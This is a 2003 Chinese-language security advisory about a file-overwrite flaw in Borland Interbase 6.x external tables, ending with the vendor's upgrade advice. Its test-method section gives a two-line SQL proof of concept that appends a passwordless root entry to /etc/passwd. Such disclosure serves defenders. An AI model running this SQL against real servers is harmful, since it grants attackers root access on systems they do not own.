发布日期：2003-04-05
更新日期：2003-04-11

受影响系统：

Borland/Inprise Interbase 6.5
Borland/Inprise Interbase 6.4
Borland/Inprise Interbase 6.0
    - Cobalt Qube 3.0
    - Debian Linux 2.2
    - HP HP-UX 11.0
    - Mandrake Linux 8.2
    - Mandrake Linux 8.1
    - Mandrake Linux 8.0
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000
    - RedHat Linux 7.3
    - RedHat Linux 7.2
    - RedHat Linux 7.1
    - RedHat Linux 7.0
    - RedHat Linux 6.2
    - Sun Solaris 8.0
    - SuSE Linux 8.0
    - SuSE Linux 7.3
    - SuSE Linux 7.2
    - SuSE Linux 7.1
    - SuSE Linux 7.0
    - SuSE Linux 6.4

不受影响系统：

Borland/Inprise Interbase 7.0

描述：

---

BUGTRAQ  ID: 7291

Interbase是一款由Borland公司开发和维护的数据库软件，可使用在多种Unix和Linux操作系统。

Interbase当建立或更改外部数据库时缺少充分检查，远程或本地攻击者可以利用这个漏洞破坏任意系统文件。

Interbase支持外部文件来存储数据，数据存储以raw格式存储并没有任何访问限制，如果指定的外部文件存储，就会以R/W追加方式打开文件。通过建立外部表文件形式，可以修改系统上可访问的系统文件，因为一般情况下默认以System (Windows)或root(Linux) 帐户运行，可以修改系统任意文件。

<*来源：Kotala Zdenìk （Zdenek.Kotala@Mius.cz）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104957649623733&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Kotala Zdenìk （Zdenek.Kotala@Mius.cz）提供了如下测试方法：

create table test external '/etc/passwd' (id char(80));
insert into test values('r00t::0:0:root:/root:/bin/bash');

建议：

---

厂商补丁：

Borland/Inprise
---------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载升级到Interbase 7.0版本：

http://www.borland.com/interbase/

浏览次数：3354
严重程度：0（网友投票）